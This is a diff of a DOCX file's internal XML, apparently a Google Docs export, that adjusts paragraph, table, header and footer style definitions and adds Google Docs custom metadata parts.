     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -5482,13 +6586,11 @@
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
-    <w:qFormat/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="1">
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
@@ -5502,7 +6604,6 @@
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
@@ -5516,7 +6617,6 @@
     <w:name w:val="heading 3"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="2"/>
     </w:pPr>
@@ -5530,7 +6630,6 @@
     <w:name w:val="heading 4"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="3"/>
     </w:pPr>
@@ -5544,7 +6643,6 @@
     <w:name w:val="heading 5"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="4"/>
     </w:pPr>
@@ -5556,7 +6654,6 @@
     <w:name w:val="heading 6"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:pPr>
       <w:outlineLvl w:val="5"/>
     </w:pPr>
@@ -5591,11 +6688,21 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="TableNormal">
+    <w:name w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblCellMar>
+        <w:top w:w="100" w:type="dxa"/>
+        <w:left w:w="100" w:type="dxa"/>
+        <w:bottom w:w="100" w:type="dxa"/>
+        <w:right w:w="100" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
   <w:style w:type="paragraph" w:styleId="a3">
     <w:name w:val="Title"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:qFormat/>
     <w:rPr>
       <w:sz w:val="56"/>
       <w:szCs w:val="56"/>
@@ -5603,8 +6710,6 @@
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
     <w:name w:val="굵은 텍스트1"/>
-    <w:basedOn w:val="a"/>
-    <w:next w:val="a"/>
     <w:qFormat/>
     <w:rPr>
       <w:b/>
@@ -5613,7 +6718,6 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="a4">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="a"/>
     <w:qFormat/>
   </w:style>
   <w:style w:type="character" w:styleId="a5">
@@ -5636,7 +6740,6 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="a7">
     <w:name w:val="footnote text"/>
-    <w:basedOn w:val="a"/>
     <w:link w:val="Char"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -5664,7 +6767,6 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="a9">
     <w:name w:val="endnote text"/>
-    <w:basedOn w:val="a"/>
     <w:link w:val="Char0"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -5680,6 +6782,133 @@
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="aa">
+    <w:name w:val="Subtitle"/>
+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="360" w:after="80"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="666666"/>
+      <w:sz w:val="48"/>
+      <w:szCs w:val="48"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="ab">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="10" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="10" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="ac">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="10" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="10" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="ad">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="10" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="10" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="ae">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="10" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="10" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:customStyle="1" w:styleId="af">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="10" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="10" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="af0">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char1"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AE2367"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
+    <w:name w:val="머리글 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="af0"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AE2367"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="af1">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char2"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AE2367"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
+    <w:name w:val="바닥글 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="af1"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00AE2367"/>
   </w:style>
 </w:styles>
 </file>
@@ -5972,4 +7201,19 @@
   <a:objectDefaults/>
   <a:extraClrSchemeLst/>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<go:gDocsCustomXmlDataStorage xmlns:go="http://customooxmlschemas.google.com/" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" uri="GoogleDocsCustomDataVersion2">
+  <go:docsCustomData xmlns:go="http://customooxmlschemas.google.com/" roundtripDataSignature="AMtx7mgCSZEnGCCXxBcR4TJcbKi3SP8fog==">CgMxLjAaJAoBMBIfCh0IB0IZCgVBcmlhbBIQQXJpYWwgVW5pY29kZSBNUxokCgExEh8KHQgHQhkKBUFyaWFsEhBBcmlhbCBVbmljb2RlIE1TMg5oLnN6cTI3OTJxMjZxdDgAciExMzIzRF9LV2ozcGtuam91UnRwcXVRRkdXemctUVJxZGs=</go:docsCustomData>
+</go:gDocsCustomXmlDataStorage>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{11111111-1234-1234-1234-123412341234}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://customooxmlschemas.google.com/"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
</xml_diff>